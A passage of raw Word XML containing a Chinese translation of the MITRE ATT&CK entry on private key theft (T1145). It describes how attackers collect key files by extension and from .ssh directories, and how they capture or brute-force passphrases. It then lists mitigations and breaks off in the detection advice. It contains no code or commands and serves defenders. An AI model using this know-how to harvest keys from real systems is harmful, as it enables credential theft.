          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会生效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E7FF8B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码过滤器在</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中显示为自动运行并加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>动态链接库</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73434A97" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0096095B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>私钥</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9736"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="20A4F49D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77916D8D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1145</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2124AD3D" w14:textId="46CAF883" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1716D01C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="613A7891" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B304DEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r>
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="272A9BF3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>Itzik Kotler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>SafeBreach</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28AD6FC1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7348F908" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5186AB7B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专用加密密钥和证书用于身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，加密</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密和数字签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D6606" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的系统中收集私钥，用于对</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等远程服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或用于解密其他收集的文件（如电子邮件）。通用密钥和证书文件扩展名包括：</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>.key</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>.pgp</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>.gpg</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>.ppk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>p12</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>.pem</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>.pfx</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>.cer</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>.p7b</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>.asc</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥目录中查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>* nix</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的系统上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
      <w:r>
        <w:t>里查找</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥，或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Users(username).ssh\</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录里</w:t>
      </w:r>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEFD3F1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>私钥应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入密码或密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短语</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才能进行操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，攻击者还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用键盘记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:t>捕捉输入</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或尝试离线暴力破解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:t>短语</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A27D46" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经发现了攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用工具</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的系统以寻找与加密密钥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>证书有关的文件扩展名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ACAD2A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2685"/>
        <w:gridCol w:w="7051"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00DA5AFC" w14:paraId="539E013E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="537BE9B7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DA5AFC" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA5AFC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="53C1F9EE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DA5AFC" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA5AFC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00C71C0D" w14:paraId="571777AC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA282EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId165" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00C71C0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>审核</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4885FBBE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保只允许授权密钥定期访问关键资源和审核访问列表。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00C71C0D" w14:paraId="0BB3D158" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A56DE8C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId166" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00C71C0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>敏感信息加密</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31A46B44" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果可能，请将密钥存储在单独的加密硬件上，而不是存储在本地系统上。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00C71C0D" w14:paraId="776D31D2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C72D4F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>分区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C5FEF54" w14:textId="77537F97" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用单独的基础设施来管理关键系统，防止系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:t>上的</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和权限重叠用于横向移动。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00C71C0D" w14:paraId="4C2E54EE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="283"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="331D29FE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId167" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00C71C0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00E0D3E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对私钥使用强密码短语，使破解变得困难。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="287D0CA6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605B079B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3FB434" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="003433BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对加密密钥和证书</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关文件和目录的访问行为。如果有</w:t>
      </w:r>
      <w:r>
        <w:t>这种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问行为</w:t>
      </w:r>
      <w:r>
        <w:t>，可能表示有</w:t>
      </w:r>
      <w:r w:rsidRPr="003433BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集和渗漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003433BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="003433BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看是否</w:t>
      </w:r>
      <w:r>
        <w:t>有异常行为可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
